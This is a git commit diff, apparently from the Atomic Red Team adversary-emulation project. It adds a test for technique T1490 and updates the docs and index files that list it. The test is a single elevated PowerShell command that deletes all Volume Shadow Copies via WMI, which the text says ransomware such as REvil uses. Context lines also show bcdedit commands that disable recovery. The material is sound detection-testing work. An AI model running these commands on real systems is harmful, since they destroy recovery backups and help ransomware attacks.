T1490 PowerShell deleting shadow copies (#785)

* Add T1490 test for Sodinokibi VSC deletion * Generate docs from job=validate_atomics_generate_docs branch=t1490-wmiobject * Generate docs from job=validate_atomics_generate_docs branch=t1490-wmiobject Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2020-01-21 12:39:36 -06:00
parent 42afe34cd3
commit 8d4be7584e
5 changed files with 54 additions and 0 deletions
@@ -19,6 +19,8 @@ A number of native Windows utilities have been used by adversaries to disable or

 - [Atomic Test #4 - Windows - Disable Windows Recovery Console Repair](#atomic-test-4---windows---disable-windows-recovery-console-repair)

+- [Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShell](#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell)
+

 <br/>

@@ -101,4 +103,26 @@ bcdedit.exe /set {default} recoveryenabled no



+<br/>
+<br/>
+
+## Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShell
+Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
+This technique is used by numerous ransomware families such as Sodinokibi/REvil.
+Executes Get-WMIObject 
+
+**Supported Platforms:** Windows
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+```
+powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}"
+```
+
+
+
+
+
+
 <br/>
@@ -58,3 +58,18 @@ atomic_tests:
      bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      bcdedit.exe /set {default} recoveryenabled no

+- name: Windows - Delete Volume Shadow Copies via WMI with PowerShell
+  description: |
+    Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
+    This technique is used by numerous ransomware families such as Sodinokibi/REvil.
+    Executes Get-WMIObject 
+
+  supported_platforms:
+    - windows
+
+  executor:
+    name: command_prompt
+    elevation_required: true
+    command: |
+      powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}"
+
@@ -516,6 +516,7 @@
  - Atomic Test #2: Windows - Delete Volume Shadow Copies via WMI [windows]
  - Atomic Test #3: Windows - Delete Windows Backup Catalog [windows]
  - Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows]
+  - Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows]
 - T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1496 Resource Hijacking](./T1496/T1496.md)
  - Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux]
@@ -16115,6 +16115,19 @@ impact:
        command: |
          bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
          bcdedit.exe /set {default} recoveryenabled no
+    - name: Windows - Delete Volume Shadow Copies via WMI with PowerShell
+      description: "Deletes Windows Volume Shadow Copies with PowerShell code and
+        Get-WMIObject. \nThis technique is used by numerous ransomware families such
+        as Sodinokibi/REvil.\nExecutes Get-WMIObject \n"
+      supported_platforms:
+      - windows
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: 'powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | ForEach-Object
+          {$_.Delete();}"
+
+'
  T1496:
    technique:
      x_mitre_data_sources:
@@ -378,6 +378,7 @@
  - Atomic Test #2: Windows - Delete Volume Shadow Copies via WMI [windows]
  - Atomic Test #3: Windows - Delete Windows Backup Catalog [windows]
  - Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows]
+  - Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows]
 - T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1496 Resource Hijacking](./T1496/T1496.md)
 - T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)